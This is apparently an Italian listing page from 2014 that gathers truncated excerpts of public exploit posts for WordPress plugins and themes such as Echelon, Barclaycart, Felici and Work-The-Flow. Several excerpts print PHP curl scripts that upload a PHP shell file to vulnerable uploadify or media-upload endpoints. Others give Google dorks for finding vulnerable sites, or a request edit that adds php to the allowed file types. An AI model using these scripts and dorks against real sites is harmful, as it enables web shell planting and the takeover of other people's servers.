WordPress WPtouch Mobile 3.4.5 Shell Upload

27 agosto 2014 - Fonte: http://www.mondounix.com
Wordpress WPtouch Mobile Plugin File Upload Vulnerability
 
=================================
 
 
====================
        ______               ___/  /  /                                /  /
       /  /  /___  ____  ___/__   /  /  ____  ____  _______  ____  ___/  /
   :  /  /  /    \/__  \/  /  /  /    \/    \/    \/  /    \/    \/     /
   | /  /  /  /  /     /  /  /  /  /  /  /  /  /__/  /  /__/  /  /  /  /
 --X-- /  /  /  /  /  /  /  /  /  /  /  /  /  /  /  /__   /   __/  /  /
   |\____/__/__/\____/\____/__/__/__/\____/__/  /__/  /  /\____/\____/
   :                   ____                        \____/:
                      /    \____  ____  ____  ____  ____ |
                     /  /  /    \/    \/    \/...

Leggi il seguito »

WordPress cnhk-slideshow Shell Upload

19 maggio 2014 - Fonte: http://www.mondounix.com
...

Leggi il seguito »

WordPress Echelon Theme Shell Upload

1 maggio 2014 - Fonte: http://www.mondounix.com
# Exploit Author:Th3 R0cksT3r
# Exploit Title: WordPress Echelon Theme Shell Upload
# Date: 25.04.2014
# Email: th3rockst3r@gmail.com 
# Vendor Homepage: http://wordpress.org/
# Google Dork: inurl:/wp-content/themes/echelon/
 
 
 
 
#Exploit :
==========
 
<?php
$uploadfile="file.php";
$ch = curl_init("
http://127.0.0.1/wp-content/themes/echelon/lib/admin/functions/media-upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('orange_themes'=>"@$uploadfile")); curl_setopt($ch,
CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch); print "$postResult";
?>
 
=========
 
Shell Access:...

Leggi il seguito »

WordPress Work-The-Flow 1.2.1 Shell Upload

30 aprile 2014 - Fonte: http://www.mondounix.com
# Author: nopesled
# Date: 24/04/14
# Software: https://wordpress.org/plugins/work-the-flow-file-upload/
# Company: http://wtf-fu.com/
# Version: 1.2.1
# Tested on: Windows 7
# Vulnerability: Unrestricted File Upload
 
 
Submit an image file via the wtf upload panel and intercept the POST request to /wp-admin/admin-ajax.php
 
By editing the data from the control 'accept_file_types', we can upload normally disallowed filetypes such as PHP.
 
Append '|php':
 
- ----------------------------123456789123456\r\n
Content-Disposition: form-data; name="accept_file_types"\r\n
\r\n
jpg|jpeg|mpg|mp3|png|gif|wav|ogg|php\r\n
 
 
Now change the extension in the data for 'filename' to '.php' and enter...

Leggi il seguito »

WordPress Business Intelligence 1.0.6 Shell Upload

31 marzo 2014 - Fonte: http://www.mondounix.com
##############################################################################################
# Exploit Title   : wordpress plugin "wp-business-intelligence" Remote code execution exploit
# Exploit Author  : Manish Kishan Tanwar
# vendor Home     : www.wpbusinessintelligence.com
# Version Affected: 1.0.6
# Discovered At   : IndiShell LAB (indishell.in aka indian cyber army)
# Love to         : zero cool,Team indishell,Hardeep Singh
##############################################################################################
 
 
////////////////////////////////////
POC Remote code Execution
////////////////////////////////////
this Plugin is vulnerable to remote code execution exploit because of ofc_upload_image.php...

Leggi il seguito »

WordPress Vithy / Appius / Dagda / Vector / Shotzz Shell Upload

25 marzo 2014 - Fonte: http://www.mondounix.com
######################################################################################
# Exploit Title   : WordPress Custom Background Shell Upload
# Google Dork     : inurl:"/wp-content/plugins/custom-background/"
# Date            : 23-03-2014
# Exploit Author  : CaFc Versace
# Tested on       : Windows 7
# Contact         : dwi[@]cooyy.net, cafc[@]surabayablackhat.org
#######################################################################################
 
 
Prooft:
-------------------------------------------------------------------------------------
<?php
$uploadfile="cafc.php.jpg";
$ch =
curl_init("http://127.0.0.1/wp-content/plugins/custom-background/uploadify/uploadify.php");
curl_setopt($ch,...

Leggi il seguito »

WordPress Felici / Custom Background Shell Upload

25 marzo 2014 - Fonte: http://www.mondounix.com
######################################################################################
# Exploit Title   : WordPress Felici Shell Upload
# Google Dork     : inurl:"/wp-content/themes/felici/"
# Date            : 23-03-2014
# Exploit Author  : CaFc Versace
# Vendor Homepage : http://wordpressnull.com/themeforest-felici-v1-7-wordpress-magazine-theme/
# Tested on       : Windows 7
# Contact         : dwi[@]cooyy.net, cafc[@]surabayablackhat.org
#######################################################################################
 
 
Prooft:
-------------------------------------------------------------------------------------
<?php
 
$uploadfile="cafc.php.jpg";
 
$ch = curl_init("http://127.0.0.1/wp-content/themes/felici/sprites/js/uploadify/uploadify.php");
curl_setopt($ch,...

Leggi il seguito »

WordPress Barclaycart Shell Upload

10 marzo 2014 - Fonte: http://www.mondounix.com
                        WordPress Barclaycart Plugins Arbitrary File Upload
 
######################################################################################
# Author : eX-Sh1Ne
#
# Facebook : www.fb.me/ShiNe.gov
#
# Google Dork => inurl:"wp-content/plugins/barclaycart"
#
#######################################################################################
 
Vuln : wp-content/plugins/barclaycart/uploadify/uploadify.php
 
Exploit :
 
<?php
$uploadfile="Sh1Ne.php";
$ch =
curl_init("http://127.0.0.1/wp-content/plugins/barclaycart/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array('Filedata'=>"@$uploadfile",...

Leggi il seguito »

WordPress Premium Gallery Manager Shell Upload

8 marzo 2014 - Fonte: http://www.mondounix.com
          Wordpress Plugins Premium Gallery Manager Arbitrary File Upload
 
######################################################################################
# Author : eX-Sh1Ne
#
# Facebook : www.fb.me/ShiNe.gov
#
# Google Dork => inurl:"wp-content/plugins/Premium_Gallery_Manager"
#
#######################################################################################
 
Vuln : wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.php
 
Exploit :
 
<?php
$uploadfile="Sh1Ne.php.jpg";
$ch =
curl_init("http://127.0.0.1/wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
...

Leggi il seguito »

WordPress thecotton Themes Remote File Upload Vulnerability

3 marzo 2014 - Fonte: http://www.mondounix.com
#################################
#
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@            @@@  @@@@@@@
#     @@@    @@@@@@@@@@@    @@@  @@         @@@     @@            @@@  @@@@@@@@ 
#     @@@    @@@            @@@    @@       @@@       @@          @@@  @@@  @@@ 
#     @@@    @@@            @@@      @@     @@@     @@            @@@  @@@  @@@ 
#     @@@    @@@@@@@@@@@    @@@       @     @@@@@@@@@@            @@@  @@@@@@
#     @@@    @@@@@@@@@@@    @@@     @@      @@@     @@            @@@  @@@@@@
#     @@@    @@@            @@@   @@        @@@       @@   @@@    @@@  @@@ @@@
#     @@@    @@@            @@@ @@          @@@     @@     @@@    @@@  @@@  @@@
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@     @@@    @@@...

Leggi il seguito »